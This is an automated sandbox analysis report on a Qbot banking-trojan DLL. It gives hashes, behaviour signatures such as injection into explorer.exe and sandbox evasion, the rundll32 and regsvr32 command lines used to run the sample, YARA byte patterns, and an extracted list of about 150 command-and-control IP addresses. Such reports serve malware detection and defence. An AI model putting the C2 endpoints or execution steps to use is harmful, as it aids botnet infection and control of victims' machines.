Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
_Rsr.dll

Overview

General Information

Sample Name:_Rsr.dll
Analysis ID:701477
MD5:416a95274ef9248e08d88d5e2abe6971
SHA1:03ac095d3a7bedad7b5c4aa1ea02c77be9fa86cb
SHA256:fce49100872fb07dea83d417a95574304dcfdfc835034739af1a50a752b8594a
Tags:dll
Infos:

Detection

Qbot
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Qbot
Malicious sample detected (through community Yara rule)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Registers a DLL
Launches processes in debugging mode, may be used to hinder debugging
Found large amount of non-executed APIs
PE file overlay found
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 4444 cmdline: loaddll32.exe "C:\Users\user\Desktop\_Rsr.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 4684 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\_Rsr.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5620 cmdline: rundll32.exe "C:\Users\user\Desktop\_Rsr.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • explorer.exe (PID: 5784 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
    • regsvr32.exe (PID: 5832 cmdline: regsvr32.exe /s C:\Users\user\Desktop\_Rsr.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • explorer.exe (PID: 4892 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
    • rundll32.exe (PID: 1652 cmdline: rundll32.exe C:\Users\user\Desktop\_Rsr.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • explorer.exe (PID: 4700 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • conhost.exe (PID: 4700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • rundll32.exe (PID: 1176 cmdline: rundll32.exe C:\Users\user\Desktop\_Rsr.dll,GDyZ MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 5776 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 656 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • WerFault.exe (PID: 1756 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 656 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 5772 cmdline: rundll32.exe C:\Users\user\Desktop\_Rsr.dll,GHQvB58h2E MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • explorer.exe (PID: 5128 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • cleanup

Malware Configuration

Threatname: Qbot

{"Bot id": "BB", "Campaign": "1662992461", "Version": "403.868", "C2 list": ["41.97.64.224:443", "191.97.234.238:995", "89.211.219.157:2222", "193.3.19.37:443", "70.51.137.118:2222", "99.232.140.205:2222", "175.110.231.67:443", "196.92.172.24:8443", "179.111.111.88:32101", "134.35.11.110:443", "84.38.133.191:443", "102.188.100.131:995", "197.94.210.133:443", "200.161.62.126:32101", "194.49.79.231:443", "41.248.89.135:443", "81.131.161.131:2078", "86.98.156.176:993", "37.210.148.30:995", "81.214.220.237:443", "64.207.215.69:443", "2.182.103.16:990", "14.172.229.70:443", "187.205.222.100:443", "95.136.41.50:443", "84.38.133.191:443", "190.158.58.236:443", "105.98.130.85:443", "190.44.40.48:995", "154.247.225.8:443", "105.197.192.21:995", "186.50.245.74:995", "181.127.138.30:443", "167.60.82.242:995", "196.112.34.71:443", "88.251.38.53:443", "68.224.229.42:443", "37.37.206.87:995", "123.240.131.1:443", "37.76.197.124:443", "188.157.6.170:443", "100.1.5.250:995", "109.158.159.179:993", "68.50.190.55:443", "181.111.20.201:443", "41.98.252.163:443", "31.166.116.171:443", "201.177.163.176:995", "84.238.253.171:443", "197.49.50.44:443", "169.159.95.135:2222", "45.160.124.211:995", "113.22.102.155:443", "211.248.176.4:443", "186.167.249.206:443", "85.114.110.132:443", "85.98.206.165:995", "139.195.132.210:2222", "182.213.208.5:443", "201.177.163.176:443", "45.183.234.180:443", "98.180.234.228:443", "184.82.110.50:995", "179.24.245.193:995", "88.245.165.2:2222", "94.99.110.157:995", "181.56.125.32:443", "119.42.124.18:443", "181.231.229.133:443", "2.89.78.130:993", "70.81.121.237:2222", "181.81.116.144:443", "197.11.128.156:443", "41.142.132.190:443", "105.111.60.60:995", "154.238.151.197:995", "156.219.49.22:995", "154.181.136.133:995", "179.223.89.154:995", "47.146.182.110:443", "102.101.231.141:443", "220.116.250.45:443", "138.0.114.166:443", "62.114.193.186:995", "85.98.46.114:443", "85.99.62.74:443", "184.99.123.118:443", "186.120.58.88:443", "46.186.216.41:32100", "156.213.107.29:995", "27.73.215.46:32102", "68.151.196.147:995", "181.59.3.118:443", "68.129.232.158:443", "45.241.140.181:995", "212.156.51.194:443", "87.75.195.211:443", "1.10.253.207:443", "87.220.229.164:2222", "109.200.165.82:443", "41.105.197.244:443", "190.59.247.136:995", "219.69.103.199:443", "61.105.45.244:443", "105.105.104.0:443", "169.1.47.111:443", "78.182.113.80:443", "210.195.18.76:2222", "125.24.129.160:995", "88.246.170.2:443", "95.10.13.82:443", "171.248.157.128:995", "118.68.220.199:443", "139.195.63.45:2222", "118.216.99.232:443", "181.80.133.202:443", "102.40.236.32:995", "46.116.229.16:443", "61.70.29.53:443", "179.108.32.195:443", "171.238.230.59:443", "81.56.22.251:995", "31.32.180.179:443", "197.204.209.38:443", "186.64.87.202:443", "85.139.203.42:32101", "120.150.218.241:995", "173.189.167.21:995", "24.139.72.117:443", "104.34.212.7:32103", "47.23.89.61:995", "24.55.67.176:443", "172.115.177.204:2222", "217.165.77.134:995", "24.178.196.158:2222", "67.209.195.198:443", "111.125.245.116:995", "39.49.67.4:995", "78.101.202.75:50010", "37.34.253.233:443", "217.165.77.134:443", "46.107.48.202:443", "70.46.220.114:443", "63.143.92.99:995", "93.48.80.198:995", "179.158.103.236:443", "47.180.172.159:443", "47.23.89.61:993", "72.252.157.93:995", "182.191.92.203:995"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000003.375314795.0000000002CD1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
    00000002.00000003.375314795.0000000002CD1000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Qbot_92c67a6dunknownunknown
    • 0xd7f4:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
    00000002.00000003.375314795.0000000002CD1000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Qbot_3074a8d4unknownunknown
    • 0x18e9c:$a4: %u;%u;%u;
    • 0x193d8:$a5: %u.%u.%u.%u.%u.%u.%04x
    • 0x19260:$a6: %u&%s&%u
    • 0x54f5:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16
    • 0x5833:$set_key: 8D 87 00 04 00 00 50 56 E8 22 16 00 00 59 8B D0 8B CE E8
    • 0x9187:$generate_random_alpha_num_string: 57 E8 D5 DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 DD 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
    00000004.00000003.374998186.0000000004812000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
      00000004.00000003.374998186.0000000004812000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Qbot_92c67a6dunknownunknown
      • 0xe3b4:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
      Click to see the 49 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.rundll32.exe.3100000.0.raw.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
        3.2.rundll32.exe.3100000.0.raw.unpackWindows_Trojan_Qbot_92c67a6dunknownunknown
        • 0x10f6c:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
        3.2.rundll32.exe.3100000.0.raw.unpackWindows_Trojan_Qbot_3074a8d4unknownunknown
        • 0x1ca14:$a4: %u;%u;%u;
        • 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x
        • 0x1cdd8:$a6: %u&%s&%u
        • 0x8c6d:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16
        • 0x8fab:$set_key: 8D 87 00 04 00 00 50 56 E8 22 16 00 00 59 8B D0 8B CE E8
        • 0x32d9:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D
        • 0x2d31:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 22 F0 FF FF 83 C4 10
        • 0xc8ff:$generate_random_alpha_num_string: 57 E8 D5 DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 DD 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
        2.3.regsvr32.exe.2cce488.0.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
          2.3.regsvr32.exe.2cce488.0.unpackWindows_Trojan_Qbot_92c67a6dunknownunknown
          • 0xf76c:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
          Click to see the 79 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Machine Learning detection for sample
          Source: _Rsr.dllJoe Sandbox ML: detected
          Source: 0.2.loaddll32.exe.a20000.0.unpackMalware Configuration Extractor: Qbot {"Bot id": "BB", "Campaign": "1662992461", "Version": "403.868", "C2 list": ["41.97.64.224:443", "191.97.234.238:995", "89.211.219.157:2222", "193.3.19.37:443", "70.51.137.118:2222", "99.232.140.205:2222", "175.110.231.67:443", "196.92.172.24:8443", "179.111.111.88:32101", "134.35.11.110:443", "84.38.133.191:443", "102.188.100.131:995", "197.94.210.133:443", "200.161.62.126:32101", "194.49.79.231:443", "41.248.89.135:443", "81.131.161.131:2078", "86.98.156.176:993", "37.210.148.30:995", "81.214.220.237:443", "64.207.215.69:443", "2.182.103.16:990", "14.172.229.70:443", "187.205.222.100:443", "95.136.41.50:443", "84.38.133.191:443", "190.158.58.236:443", "105.98.130.85:443", "190.44.40.48:995", "154.247.225.8:443", "105.197.192.21:995", "186.50.245.74:995", "181.127.138.30:443", "167.60.82.242:995", "196.112.34.71:443", "88.251.38.53:443", "68.224.229.42:443", "37.37.206.87:995", "123.240.131.1:443", "37.76.197.124:443", "188.157.6.170:443", "100.1.5.250:995", "109.158.159.179:993", "68.50.190.55:443", "181.111.20.201:443", "41.98.252.163:443", "31.166.116.171:443", "201.177.163.176:995", "84.238.253.171:443", "197.49.50.44:443", "169.159.95.135:2222", "45.160.124.211:995", "113.22.102.155:443", "211.248.176.4:443", "186.167.249.206:443", "85.114.110.132:443", "85.98.206.165:995", "139.195.132.210:2222", "182.213.208.5:443", "201.177.163.176:443", "45.183.234.180:443", "98.180.234.228:443", "184.82.110.50:995", "179.24.245.193:995", "88.245.165.2:2222", "94.99.110.157:995", "181.56.125.32:443", "119.42.124.18:443", "181.231.229.133:443", "2.89.78.130:993", "70.81.121.237:2222", "181.81.116.144:443", "197.11.128.156:443", "41.142.132.190:443", "105.111.60.60:995", "154.238.151.197:995", "156.219.49.22:995", "154.181.136.133:995", "179.223.89.154:995", "47.146.182.110:443", "102.101.231.141:443", "220.116.250.45:443", "138.0.114.166:443", "62.114.193.186:995", "85.98.46.114:443", "85.99.62.74:443", "184.99.123.118:443", "186.120.58.88:443", "46.186.216.41:32100", "156.213.107.29:995", "27.73.215.46:32102", "68.151.196.147:995", "181.59.3.118:443", "68.129.232.158:443", "45.241.140.181:995", "212.156.51.194:443", "87.75.195.211:443", "1.10.253.207:443", "87.220.229.164:2222", "109.200.165.82:443", "41.105.197.244:443", "190.59.247.136:995", "219.69.103.199:443", "61.105.45.244:443", "105.105.104.0:443", "169.1.47.111:443", "78.182.113.80:443", "210.195.18.76:2222", "125.24.129.160:995", "88.246.170.2:443", "95.10.13.82:443", "171.248.157.128:995", "118.68.220.199:443", "139.195.63.45:2222", "118.216.99.232:443", "181.80.133.202:443", "102.40.236.32:995", "46.116.229.16:443", "61.70.29.53:443", "179.108.32.195:443", "171.238.230.59:443", "81.56.22.251:995", "31.32.180.179:443", "197.204.209.38:443", "186.64.87.202:443", "85.139.203.42:32101", "120.150.218.241:995", "173.189.167.21:995", "24.139.72.117:443", "104.34.212.7:32103", "47.23.89.61:995", "24.55.67.176:443", "172.115.177.204:2222", "217.165.77.134:995", "24.178.196.158:2222", "67.209.195
          Source: _Rsr.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
          Source: Binary string: amstream.pdb source: explorer.exe, 00000012.00000003.398009838.0000000004E61000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.397473099.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.399403223.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.397028896.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: amstream.pdbGCTL source: explorer.exe, 00000012.00000003.398009838.0000000004E61000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.397473099.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.399403223.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.397028896.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D50D074 FindFirstFileExA,0_2_6D50D074
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027AC134 FindFirstFileW,FindNextFileW,2_2_027AC134
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6D50D074 FindFirstFileExA,2_2_6D50D074
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027A5CC4 GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,BitBlt,GetCursorInfo,CopyIcon,GetIconInfo,GetObjectW,DrawIconEx,SelectObject,GetObjectW,GetDIBits,DeleteDC,DeleteDC,DeleteObject,2_2_027A5CC4
          Source: loaddll32.exe, 00000000.00000002.396414713.0000000000AFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.2.rundll32.exe.3100000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 3.2.rundll32.exe.3100000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 2.3.regsvr32.exe.2cce488.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 2.3.regsvr32.exe.2cce488.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 18.2.explorer.exe.2f80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 18.2.explorer.exe.2f80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 2.3.regsvr32.exe.2cce488.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 2.3.regsvr32.exe.2cce488.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 2.2.regsvr32.exe.27a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 2.2.regsvr32.exe.27a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 20.0.explorer.exe.26f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 20.0.explorer.exe.26f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 4.2.rundll32.exe.2eb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 4.2.rundll32.exe.2eb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 2.3.regsvr32.exe.2cce488.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 2.3.regsvr32.exe.2cce488.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 4.2.rundll32.exe.2eb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 4.2.rundll32.exe.2eb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 22.0.explorer.exe.2ed0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 22.0.explorer.exe.2ed0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 18.0.explorer.exe.2f80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 18.0.explorer.exe.2f80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 19.2.explorer.exe.2e20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 19.2.explorer.exe.2e20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 3.2.rundll32.exe.3100000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 3.2.rundll32.exe.3100000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 22.0.explorer.exe.2ed0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 22.0.explorer.exe.2ed0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 19.2.explorer.exe.2e20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 19.2.explorer.exe.2e20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 19.0.explorer.exe.2e20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 19.0.explorer.exe.2e20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 22.2.explorer.exe.2ed0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 22.2.explorer.exe.2ed0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 0.2.loaddll32.exe.a20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 0.2.loaddll32.exe.a20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 18.2.explorer.exe.2f80000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 18.2.explorer.exe.2f80000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 2.3.regsvr32.exe.2cce488.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 2.3.regsvr32.exe.2cce488.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 20.2.explorer.exe.26f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 20.2.explorer.exe.26f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 19.0.explorer.exe.2e20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 19.0.explorer.exe.2e20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 2.2.regsvr32.exe.27a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 2.2.regsvr32.exe.27a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 20.2.explorer.exe.26f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 20.2.explorer.exe.26f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 18.0.explorer.exe.2f80000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 18.0.explorer.exe.2f80000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 20.0.explorer.exe.26f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 20.0.explorer.exe.26f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 22.2.explorer.exe.2ed0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 22.2.explorer.exe.2ed0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 0.2.loaddll32.exe.a20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 0.2.loaddll32.exe.a20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000002.00000003.375314795.0000000002CD1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000002.00000003.375314795.0000000002CD1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000004.00000003.374998186.0000000004812000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000004.00000003.374998186.0000000004812000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000002.00000003.375073363.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000002.00000003.375073363.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000016.00000002.644257904.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000016.00000002.644257904.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000016.00000000.395725211.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000016.00000000.395725211.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000003.00000002.387752109.0000000003100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000003.00000002.387752109.0000000003100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000014.00000002.400269525.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000014.00000002.400269525.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000003.00000003.375512437.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000003.00000003.375512437.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000000.00000003.388462943.0000000000926000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000000.00000003.388462943.0000000000926000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000012.00000000.384502411.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000012.00000000.384502411.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000013.00000000.386652741.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000013.00000000.386652741.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000000.00000002.396304567.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000000.00000002.396304567.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000004.00000002.387696513.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000004.00000002.387696513.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000012.00000002.399869043.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
